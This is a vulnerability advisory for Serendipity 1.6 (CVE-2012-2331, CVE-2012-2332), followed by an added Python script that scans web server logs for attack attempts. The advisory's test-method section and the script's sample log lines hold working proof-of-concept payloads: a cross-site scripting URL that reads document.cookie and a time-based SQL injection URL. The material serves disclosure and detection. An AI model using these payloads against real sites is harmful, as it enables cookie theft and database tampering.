Release date:
Updated on:
Affected Systems:
Serendipity 1.6
Unaffected Systems:
Serendipity 1.6.1
Description:
--------------------------------------------------------------------------------
Bugtraq ID: 53418
CVE ID: CVE-2012-2331, CVE-2012-2332
Serendipity is a blog/CMS application written in PHP.
Serendipity 1.6 and other versions contain SQL injection and cross-site scripting vulnerabilities. Successful exploitation allows attackers to run malicious script code, steal cookie-based authentication credentials, control the application, and access or modify data.
<* Source: Stefan Schurtz
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Use them at your own risk!
Cross Site-Scripting:
http://www.example.com/serendipity/serendipity_admin_image_selector.php?serendipity[textarea]='"</script><script>alert(document.cookie)</script>
SQL-Injection:
http://www.example.com/serendipity/serendipity_admin.php?serendipity[adminModule]=plugins&serendipity[plugin_to_conf]=-1' or sleep(10)=0 LIMIT 1--+
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
Serendipity
-----------
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:
http://www.s9y.org/12.html
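
To check whether an unpatched installation has received requests of the two shapes listed under "Test method", the web server access log can be scanned for the affected scripts and parameters. The script below is an added example, not part of the original advisory or of Serendipity. It assumes Combined Log Format, that legitimate values of `serendipity[textarea]` and `serendipity[plugin_to_conf]` are plain identifiers, and it uses constructed sample log lines.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Script -> parameter pairs named in the advisory's test method.
WATCHED = {
    "serendipity_admin_image_selector.php": "serendipity[textarea]",
    "serendipity_admin.php": "serendipity[plugin_to_conf]",
}
# Assumption: legitimate values are plain identifiers (letters, digits and a
# few separators). Tune this allowlist to what your installation really sends.
BENIGN = re.compile(r"^[A-Za-z0-9_:.\[\]@/-]*$")
# Request field of a Combined Log Format line: "METHOD target HTTP/x.y"
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [10/May/2012:10:00:01 +0000] "GET /serendipity/index.php?/archives/1-post.html HTTP/1.1" 200 5120',
    '203.0.113.5 - - [10/May/2012:10:00:07 +0000] "GET /serendipity/serendipity_admin.php?serendipity[adminModule]=plugins&serendipity[plugin_to_conf]=serendipity_event_spamblock:abc123 HTTP/1.1" 200 8841',
    '198.51.100.9 - - [10/May/2012:10:02:13 +0000] "GET /serendipity/serendipity_admin.php?serendipity%5BadminModule%5D=plugins&serendipity%5Bplugin_to_conf%5D=-1%27%20or%20sleep(10)%3D0%20LIMIT%201--+ HTTP/1.1" 200 8841',
    '198.51.100.9 - - [10/May/2012:10:03:40 +0000] "GET /serendipity/serendipity_admin_image_selector.php?serendipity%5Btextarea%5D=%27%22%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1" 200 2210',
]

def suspicious_requests(lines):
    """Return (line_number, script, parameter, decoded_value) for each hit."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST.search(line)
        if not match:
            continue  # not a parsable request line
        target = urlsplit(match.group(1))
        script = target.path.rsplit("/", 1)[-1]
        parameter = WATCHED.get(script)
        if parameter is None:
            continue  # not one of the affected scripts
        # parse_qsl percent-decodes keys and values, so encoded and literal
        # brackets in the parameter name are treated the same.
        for key, value in parse_qsl(target.query, keep_blank_values=True):
            if key == parameter and not BENIGN.match(value):
                hits.append((number, script, parameter, value))
    return hits

if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE_LOG):
        print(hit)
```

Only query strings are visible in an access log, so values sent in a POST body are not covered by this check.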